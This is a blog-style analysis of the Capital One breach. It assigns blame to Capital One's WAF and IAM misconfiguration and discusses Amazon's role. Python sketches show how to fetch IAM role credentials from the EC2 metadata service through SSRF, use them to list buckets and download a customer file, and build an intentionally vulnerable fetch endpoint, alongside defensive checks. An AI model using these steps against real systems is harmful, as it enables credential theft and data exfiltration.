Capital One Breach

Was Amazon at fault?

I was asked a question about the Capital One breach. It seems that, in some quarters, fingers are being pointed at Amazon, with the suggestion that they should be held (at least partly) to blame for this.

It also seems that Senator Wyden is asking Amazon questions about this.

There’s also a question around Paige Thompson, the hacker, and her previous employment at Amazon. If she used insider knowledge to break into Capital One then this would erode a lot of trust in Amazon Web Services, and in the public cloud in general.

And, finally, were code repos used in the attack? Is there a whole supply-chain issue here?

Now, I’m not convinced by any of this. Pretty much all the chatter I’ve heard in the InfoSec communities has been “It’s all Capital One’s fault”.

It’s not 100% clear from the indictment, but it looks like the attacker used SSRF against the WAF to reach the EC2 metadata URL, which returned temporary credentials for the instance’s IAM role; those credentials were overly broad and gave access to S3 buckets.

It’s also not clear whether this was an AWS WAF, or a third-party WAF (e.g. Imperva, F5) hosted on an EC2 instance.
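
To make the mechanics concrete, here’s a minimal sketch of the metadata calls involved, assuming the older IMDSv1 interface (no session token required). Run directly on an instance these lookups are legitimate; reached through an SSRF hole in a front end that will fetch arbitrary URLs, they hand the instance’s role credentials to the attacker.

```python
# Sketch of the IMDSv1 metadata lookups involved (illustrative, not the
# attacker's actual code). Via SSRF, the same URLs are fetched by the
# vulnerable front end on the attacker's behalf.
import requests

BASE = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# First call returns the name of the IAM role attached to the instance.
role = requests.get(BASE, timeout=2).text.strip()

# Second call returns temporary credentials for that role as JSON:
# AccessKeyId, SecretAccessKey, Token and Expiration.
creds = requests.get(BASE + role, timeout=2).json()
print(creds["AccessKeyId"], creds["Expiration"])
```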

So the first set of questions I have are:

  • Why didn’t the WAF block the metadata URL?
  • Why was the WAF EC2 instance associated with an IAM role?
  • Why was the role overly broad? (see the sketch after this list)
  • Why wasn’t the data encrypted in the bucket?
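
To show why the last two questions matter, here’s a rough sketch (with made-up bucket and key names) of what leaked temporary role credentials allow from anywhere on the internet, if the role’s policy is broad enough:

```python
# Sketch only: using leaked temporary role credentials from outside AWS.
# The placeholder values stand in for the AccessKeyId / SecretAccessKey /
# Token returned by the metadata service; bucket and key names are made up.
import boto3

session = boto3.Session(
    aws_access_key_id="ASIA...",
    aws_secret_access_key="...",
    aws_session_token="...",
)
s3 = session.client("s3")

# An overly broad role lets you enumerate buckets...
for bucket in s3.list_buckets()["Buckets"]:
    print(bucket["Name"])

# ...and pull objects out. Note that server-side encryption doesn't help:
# S3 decrypts transparently for anyone presenting valid credentials.
obj = s3.get_object(Bucket="victim-backups", Key="customers.csv")
data = obj["Body"].read()
```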

Out of all of this, Amazon themselves may be partially implicated:

  • If it was an AWS WAF, why doesn’t that block the metadata URL by default? (a sketch of what such blocking could look like follows this list)
  • Did the attacker make use of knowledge obtained when she was working for Amazon 3 years earlier?
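
I don’t know what the WAF in question actually offered, but purely as an illustration, “blocking the metadata URL” amounts to something like the following check before a request is proxied onwards, refusing anything that resolves into the link-local range:

```python
# Illustration only: one way a WAF/proxy layer could refuse to forward
# requests aimed at the instance metadata service (link-local 169.254.0.0/16).
import ipaddress
import socket
from urllib.parse import urlparse

def is_blocked(url: str) -> bool:
    host = urlparse(url).hostname or ""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True  # refuse anything we can't resolve
    for *_, sockaddr in infos:
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.is_link_local or ip.is_loopback:
            return True
    return False

print(is_blocked("http://169.254.169.254/latest/meta-data/"))  # True
```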

So it’s really really looking like a pure Capital One misconfiguration.

It is interesting that Capital One created Cloud Custodian to try to detect misconfigs :-) It’s clear that detection is a hard problem, and not so good for those “unknown” edge cases.
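
For flavour: a known misconfig is easy to write a check for; it’s the novel combination (SSRF plus a broad role plus readable buckets) that rule-based detection tends to miss. A rough sketch of such a check, not an actual Cloud Custodian policy:

```python
# Sketch of a simple "known misconfig" check: flag S3 buckets with no
# default encryption configured. Useful, but it wouldn't have caught the
# SSRF-plus-broad-role chain.
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    try:
        s3.get_bucket_encryption(Bucket=name)
    except ClientError as err:
        if err.response["Error"]["Code"] == "ServerSideEncryptionConfigurationNotFoundError":
            print(f"{name}: no default encryption")
        else:
            raise
```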

Note: S3 server-side encryption is inadequate here because the service will decrypt data automatically for anyone with the right credentials. I consider it the equivalent of block-device encryption or TDE (Transparent Data Encryption); an SA or a DBA can still get to the data, and app-level encryption is still required. Indeed, I wrote about this 2 years ago!
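
A minimal sketch of what app-level encryption means in practice, assuming the cryptography library and a key held outside S3 (bucket and key names are hypothetical); an attacker holding only the role credentials gets ciphertext:

```python
# Sketch of application-level encryption before upload (hypothetical names).
# The key lives with the application, not with S3, so S3 credentials alone
# only ever yield ciphertext.
import boto3
from cryptography.fernet import Fernet

key = Fernet.generate_key()   # in reality, fetched from your own key store
f = Fernet(key)

ciphertext = f.encrypt(b"ssn=123-45-6789")

s3 = boto3.client("s3")
s3.put_object(Bucket="example-bucket", Key="records/1.bin", Body=ciphertext)

# Reading the data back requires both the S3 credentials *and* the key.
obj = s3.get_object(Bucket="example-bucket", Key="records/1.bin")
plaintext = f.decrypt(obj["Body"].read())
```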

So I’m not willing to point fingers at Amazon at this stage.

I don’t think code repos were used in the attack; at least this time there wasn’t a supply-chain issue! But the attacker did put her results into GitHub, and that may be where some of the confusion came from. There’s at least one suit being brought against GitHub for allowing this data to be stored there.

Senator Ron Wyden’s letter looks a lot like a fishing expedition along the lines of “your customers keep f***ing up; what are you going to do about it?“, with a side helping of “you created something easily broken; you hold some responsibility”.

The thing is that SSRF attacks have been known for a long time. Indeed the OWASP page for them explicitly mentions the metadata service as an example… and that’s from 2017.

Cloud server meta-data - Cloud services such as AWS provide a REST interface on http://169.254.169.254/ where important configuration and sometimes even authentication keys can be extracted
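
For illustration, the classic vulnerable pattern is a service that will fetch whatever URL a client hands it. This is a hypothetical minimal example, not Capital One’s actual setup:

```python
# Hypothetical minimal SSRF example -- not Capital One's actual code.
# A proxy-style endpoint fetches whatever URL the caller supplies, so
# /fetch?url=http://169.254.169.254/latest/meta-data/... is forwarded
# straight to the instance metadata service.
from flask import Flask, request
import requests

app = Flask(__name__)

@app.route("/fetch")
def fetch():
    url = request.args.get("url", "")
    # No validation of the target host: this is the SSRF.
    return requests.get(url, timeout=5).text
```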

So that adds a new question:

  • Why didn’t Capital One’s pentesters discover this?

Now as I was writing this up I came across Amazon’s reply to Senator Wyden.

It doesn’t really clear up the WAF question, although it feels to me as if they’re talking about third-party WAFs. They’re definitely putting the blame at Capital One’s feet:

As Capital One outlined in their public announcement, the attack occurred due to a misconfiguration error at the application layer of a firewall installed by Capital One, exacerbated by permissions set by Capital One that were likely broader than intended.

One interesting part of the letter is that they’re going to start scanning their public IP ranges for similar misconfigs, and alert customers. This is similar to other sorts of scanning that Amazon proactively do (e.g. searching GitHub for API credentials).

Is this tacit acknowledgment that they are partially to blame? Maybe :-)

My conclusions are:

  • AWS are not to blame for the breach
    • AWS may have made it too easy for misconfigs to happen
  • Github was not used to create the attack; it just stored the results
  • This is a pure Capital One f**k up

Summary:

I really am not a fan of the AWS security model; there are far, far too many knobs and controls, and it’s not clear how they interact with each other. It can be hard even to answer something simple (“Is this server’s port 22 open to the internet?“) because of how the configurations interact (security groups, routing tables, network ACLs, and so on).
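
As a sketch of how partial even the obvious answer is, the check below only inspects security groups; network ACLs, route tables and host firewalls can all still change the real answer, which is rather the point:

```python
# Partial answer to "is port 22 open to the internet?" -- this only looks
# at security groups; network ACLs, route tables and host firewalls are
# not considered.
import boto3

ec2 = boto3.client("ec2")
for sg in ec2.describe_security_groups()["SecurityGroups"]:
    for perm in sg.get("IpPermissions", []):
        from_port, to_port = perm.get("FromPort"), perm.get("ToPort")
        covers_22 = from_port is None or from_port <= 22 <= (to_port or 65535)
        open_world = any(r.get("CidrIp") == "0.0.0.0/0" for r in perm.get("IpRanges", []))
        if covers_22 and open_world:
            print(f"{sg['GroupId']} ({sg['GroupName']}): SSH open to 0.0.0.0/0")
```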

It is critical that any company using the public cloud understands the technology it is relying on. Just because Amazon provide 100+ services doesn’t mean you know how to secure the ones you use. How many data breaches have occurred because of backups in insecure S3 buckets, for example?

In the Capital One case, SSRF and the metadata URL are well known; this should have been detected during application security testing. There’s more than one problem here!